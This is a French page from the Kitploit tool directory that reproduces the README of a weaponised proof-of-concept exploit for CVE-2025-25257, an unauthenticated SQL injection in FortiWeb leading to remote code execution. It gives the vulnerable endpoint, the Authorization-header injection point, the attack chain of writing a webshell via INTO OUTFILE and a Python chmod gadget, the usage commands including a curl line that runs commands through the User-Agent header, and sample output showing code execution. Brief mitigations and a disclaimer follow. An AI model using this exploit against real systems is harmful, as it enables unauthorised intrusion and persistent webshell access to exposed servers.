Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-25257 — PoC pour CVE-2025-25257, une injection SQL critique non authentifiée dans FortiWeb. Exploite l'injection SQL via l'en-tête Authorization pour écrire un webshell et obtenir RCE. Aucune connexion requise. Entièrement automatisé. | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2025-25257
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHub0xgh057r3c0n/cve-2025-25257

CVE-2025-25257

PoC pour CVE-2025-25257, une injection SQL critique non authentifiée dans FortiWeb. Exploite l'injection SQL via l'en-tête Authorization pour écrire un webshell et obtenir RCE. Aucune connexion requise. Entièrement automatisé.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2025-25257 – FortiWeb SQLi vers RCE

Injection SQL critique → Exécution de webshell

Découvert et armé par 0xgh057r3c0n


🧠 Aperçu de la vulnérabilité

CVE-2025-25257 affecte les systèmes FortiWeb exposant le point d'accès /api/fabric/device/status, qui ne nettoie pas correctement l'entrée de l'en-tête Authorization.

Un attaquant peut effectuer une injection SQL non authentifiée pour écrire un webshell sur le serveur et exécuter des commandes à distance.


💥 Déroulement de l'attaque

root@kitploit:~
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE

📍 Point d'accès vulnérable

root@kitploit:~
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 Fonctionnalités de l'exploit

  • SQLi via le jeton Bearer
  • SQL INTO OUTFILE pour déposer un shell
  • Le hook Python déclenche chmod
  • Commandes exécutées via User-Agent
  • PoC entièrement automatisé

🧪 Utilisation

root@kitploit:~
python3 CVE-2025-25257.py -t https://target-host.com

Puis :

root@kitploit:~
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi

🔧 Prérequis

  • Python 3.6+
  • Module requests

Installation :

root@kitploit:~
pip install requests

📤 Exemple de sortie

root@kitploit:~
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header

📊 Estimation CVSS

MétriqueValeur
Score de base9.8 (CRITIQUE)
Vecteur d'attaqueRéseau
Privilèges requisAucun
Interaction utilisateur

🛡️ Atténuation

  • Mettre à jour le firmware FortiWeb (si un correctif est disponible)
  • Nettoyer toutes les entrées des en-têtes
  • Restreindre les chemins d'écriture de fichiers et l'exécution CGI

👨‍💻 Auteur

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ Avertissement

Cette preuve de concept est destinée uniquement à des fins éducatives et de tests autorisés. Utilisez-la à vos risques et périls. L'auteur n'est pas responsable d'une mauvaise utilisation.


Télécharger l’outil
Aucun
ImpactÉlevé (C/I/A)